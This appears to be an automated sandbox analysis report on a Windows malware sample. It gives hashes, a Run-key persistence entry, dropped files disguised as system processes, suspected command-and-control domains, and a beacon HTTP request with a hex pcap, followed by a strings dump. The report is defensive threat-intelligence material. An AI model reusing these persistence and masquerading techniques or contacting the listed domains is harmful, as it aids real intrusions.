Analysis Date: 2014-08-22 00:58:12
MD5: e8d4d58c7cbe317a1b10bc02bef44482
SHA1: 21d634ce52085681bb81be0137c432466b2970ca

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text (md5: 465752e070de02d8000e3f28863cb119, sha1: ce9b467b880061ab0bb00cab6d80b7bb76aa02ba, size: 100864)
Section .tls (md5: fe35324cae61a98a1d32c78552f30531, sha1: a132c32a1ab5611d6c18c4a8323c137547839801, size: 1536)
Section .data (md5: 076a39c9c8e4ef0eb5ba483562482bf8, sha1: a506102e5e86616cade27b94d5595cb2796995a5, size: 67584)
Section .reloc (md5: db5e395a3fea00f7bc629ac8d5647009, sha1: 306cbd8c475331f6df86349e49483e10206b3cc2, size: 1024)
Timestamp (PE header compile time): 2005-09-24 08:44:40
PEhash: 9b751f88f175dc01481a691e918b6311e90e61ff
IMPhash: 4a647c36316b5236453f1bc2580ac57f

Runtime Details:


Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry (Run key, autostart entry): HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS: 127.0.0.1
Winsock DNS: happyratatuy.com
Winsock DNS: superaudiosysrem.com
Winsock DNS: crazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: crazyleafdesign.com
Type: A ➝ 173.249.152.55
DNS: happyratatuy.com
Type: A (no address recorded in this report)
DNS: superaudiosysrem.com
Type: A (no address recorded in this report)
HTTP GET: http://crazyleafdesign.com/blog/images/share/facebook.png?v99=44&tq=gJ4WK%2FSUh6zGkUR8oY%2BQrMWTUj26kJHjyZpSK%2B%2FbxWq1SfkIYVhX
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 173.249.152.55:80

Raw Pcap
0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f736861 72652f66 61636562 6f6f6b2e   /share/facebook.
0x00000020 (00032)   706e673f 7639393d 34342674 713d674a   png?v99=44&tq=gJ
0x00000030 (00048)   34574b25 32465355 68367a47 6b555238   4WK%2FSUh6zGkUR8
0x00000040 (00064)   6f592532 4251724d 5754556a 32366b4a   oY%2BQrMWTUj26kJ
0x00000050 (00080)   486a795a 70534b25 32422532 46627857   HjyZpSK%2B%2FbxW
0x00000060 (00096)   71315366 6b495956 68582048 5454502f   q1SfkIYVhX HTTP/
0x00000070 (00112)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000080 (00128)   20636c6f 73650d0a 486f7374 3a206372    close..Host: cr
0x00000090 (00144)   617a796c 65616664 65736967 6e2e636f   azyleafdesign.co
0x000000a0 (00160)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000b0 (00176)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000c0 (00192)   6c6c612f 322e300d 0a0d0a              lla/2.0....


Strings
{
YH4`
.
.D...
W
.
#h
..~.
 
4..2
x
080904b0
1484
3.0.0.1
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
0h0hN;
0hARh|
0hL&Rh
0h#PhKJ
^0h}Zd5m}
0KDHHT
0l}.l8
!\0ra6
#10hqC3
150he.
17k`h*a&I
1:CFi^
1drhph
1V3_*G
2:#Cf`
2h#1+D
}2hc&3
2h{J2h
2h:mrh
2hQf0hA
2hRhN:[U
2hs}rh
2ht6%i2h
&2wBMu
3@h5O`h
3 h@hk
:3Ph]Z]8c
3rh:O#
3V2hV#
4dXe(z
#4g9Z	
,4LG5]rhe
`4<p7oI
5&AP/;4
)]5juZ
5)<,<~S
63;S\o
+6(?`B
6Da*xXD
6~:&dnt
6ncKe7
~6'wpQ
7Ali h
7j`PHT
`*7l:-
8cW'+N
"8"I$ 
8j9dtoTlY}u1
8j]Nbh
^8=JPhK
8S^l@X
9phSt_
9X|0NN
!A-:/=A
{aDYi)x=
AI6W[:
}*ALnV>
AlphaBlend
a>]n h
.-'Av~
Ax{2k5B'G.
b3bcw	
b6h[){nt
beM-}3
Bh)A6<(
Bh[&!axKT
bhDoph}
bhha.G
Bh hAv
bh`hbh
bhH}Nrh	
bh hrh
bh%phY(
bhQ,SH
BhSPhK	v
bhuEx+
Bh/x.65
BLD`2	
BoL6li3
/Bz-)]
%C1Urh_
C:bh0h
ChAly:
c/k.M6
c{N>CA+x
CoCreateInstance
C/O\E!yB
CoGetMalloc
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
 cq:^R
CreateFontIndirectA
c[tZ^bh*
cU!	M`h
"~CVJ6Y
CW}A.a
Cz8S8GWG
czUmWId".D
d1phc{
d?2hhx
@.data
d>Bh h]f
DeleteCriticalSection
DeleteObject
DGhg*O
D hgRh
d@h(Sj
D^L-qL
d{t^#6
e8Bh@h
e?^k9a
EnterCriticalSection
EnumResourceNamesW
Et0hfBh
EUz1Q`
[ew@h	XJ
EW.(@k
e+XEN-\{
EYxRhmL
f;>[{^
F h]g}
F	.K<g
flIs<(
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Fu#BA]i
G+	#``
G699$p
GDI32.dll
GeD#A(`h?z
GetACP
GetCPInfo
GetCPInfoExA
GetCurrentProcessId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetOEMCP
GetStartupInfoA
GetStdHandle
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
GLj=QM
GUx h];
GVb6-p
gWB.bW
g_w\}t
G${-*XpBL>"
[#-`h	
#<`h	.
."h0h'
h'{0h4
`h/5I*
h5n53Q
h6BhCcs
h7UWBh5
	H86eL
h\;91ZHJ
h9,?"h
@hAT	`h
 h?bh-^!`h4H
@hBhPh,
@hBhwJ
`h\cT:
hdH(ic
HeapSize
h'eSuV~udA
HFg&9c
h#\Fmph
hfO\1N
h$'frh
hg0hrh
hg"Nh8~Jw
[-@h`h
h;"hA)g
h`hFph
"h"hGF
h"h h_
h	`h`h
h+$"h`hf0h
h`h"h_rh
H@hn>h
h"hO8u
h`hqBh^
h"hW}>
hHxnrh
 hi:0hQ
h&ia9Ph
 hINYSI
hIph@h
hjI"h)
hJO]mtZ
`h~JQy
h+K`hO
hKrhph
`h-^&L
hLBhd<
hl(g}5J
hl@h2hL
hl"h-6
hl"h h
hMBh9~;2hNdk{l
h}MI9)o
h-Mn9Ph
? hmph
"hmQ],K{< hd
`hMvsPh
h;Mx&V
hnHKPh[
hnVbh0hN
`hNXx,!
hoKT*q
h+ph]|
h)Ph5{]n
hPh8Q~
hph hS
hphph$
hph%u*|^6
`hq)&6
h	qcbh
!hQE\H
 hqMW3c
$hqNq2h
hQse3n
Hr96,.
:`hRha
hrhAD\
H+Rhcv
hRhQg>
hRhSH)
hrhvIm
hs>.|g
h>SGE;
hS@h4rh
hs]j@U
hsrh;rh
@htDph
@h:t"h
?htsH{.
Hv3=Ph
hVaXRh
h+VT4Y
hw6sRhN
hYBhbh.
h._[yl
:;"hYSix
hz5e|Rh
hz`hbh
I7%U[B_o
IkbhPh
I)kbS%
InitializeCriticalSection
InterlockedExchange
InterlockedIncrement
iRhs)^
iZ!wZK@h+rh
.J0Q!?.
(J3^>"[
J5]O&N
^^J7C.
jiTxzM
j+OCg(:
JS8I)QW
J%TU{U
$j+;,WU4F
jWXO}9]rov
keRhrh
KERNEL32.dll
ks76+}d
k'~v"h=
kYm&=G<
]l!-#-
L2g*{=
lBh2hj
=L	.d`
ldbh!^
)ld;CY
LeaveCriticalSection
;>L= h
lh2.dl
lla\zZ
l=Ph8~e2h
	lRh.t
lstrlenW
|Lw)Vq
ly[Rh?
!m3]`h
"M|CYHx
&mIs3	Yo
"MRDDH
MSIMG32.dll
mTJ(/@hK
mU<]Gnz
MultiByteToWideChar
n1y`h^
Nb\q@O
[NF	1H
}N$\@h
nH<Ru-M'
nI<nag
,NkHLC'
}NKo>1
NmlJW6
nn	m`h
Nq:Ag,
%nRh2h
NV:\Bh
nZ7<%/
Ob)>.LI
oG	):$
[o&' h
O@hAph
ohPhug:
{OJ[ h?
ole32.dll
:&omrh.
Ot*St/
Pd87pb
]ph30h
ph8sRh
ph$bhXg
PhNIA"h
Pho)`h-
phPhEo{
[ph&Qf
Phrh,F
PhRh`h
[Phrhrh
phU3/AT
phXFPh h
P+-@\k
&PR,!W
!<Ps=f4
p<Xi/1
/q2hbh
	q(}`7
<'QCvn
*Q;fTj
}_qLZ:
QOPh:k
qT>rh4
QueryPerformanceCounter
(qu-'r
QWf+vCU
RaiseException
r~<`@"C
.reloc
(RhBha
Rh/e"h h
Rh\F,2h[
RhGdHC
\rhm@h
Rho$}>
rhRhqV{
rhV)~F
rkZ|<l
r'{m~SF
@rZuw"
<s2hC8
S~_d@h
SDrhn+
SelectObject
SetHandleCount
S'G@$a
sH>eBh
]|s	:l
StringFromGUID2
)s	V18
$<sV1k
t(1+BI
~.t7g3
t_8O,e$&
t}:^8v
^tA h#
t`E	uS
!This program cannot be run in DOS mode.
ti(7@h
TlsGetValue
TlsSetValue
@[Tol~
TP[=|J
TransparentBlt
&tt^m@
TU<pqf
twk:ph
ty,"Bw
tz99m1
u` |+"
|U(0h}#
%u0hBh
<u.2h'Y
(u5	o^`
u79vRJPy
uDhE<9
u\*%E:
u} hnU
UK}\[+@hph*H
UnhandledExceptionFilter
U$Phh h
v2h"h;D
= V70{
v>9m0hh)Phl
<V9^rh,
?v;];C
}Vm'o$
=VNhW7i!0h@hy
%V]Q+/
VRs	g`
&){VV7
W5n`hC
$w ]\.B
/wDobR@
w]#@hE
WideCharToMultiByte
WL5R?_atq
w*Qk%]z
WriteFile
ws=0vW
wU@hwFu
|X0hXD
!-x_dQbh<
x"h^`hG
X/icPP"P7
]Xik2hv
\xj N8
xLa^CE
'X$lt)
$}+y2e\Lq;
|]ybF/[
Y@h@hL
y"hnph
Y,U~)uq
z2hMBh
z_>A2-|
ZEcrht
zkrhov
Z|MpR&
z%{nSq
zO[%TGx
Z%ueph
z?W{-:
\`#zZ{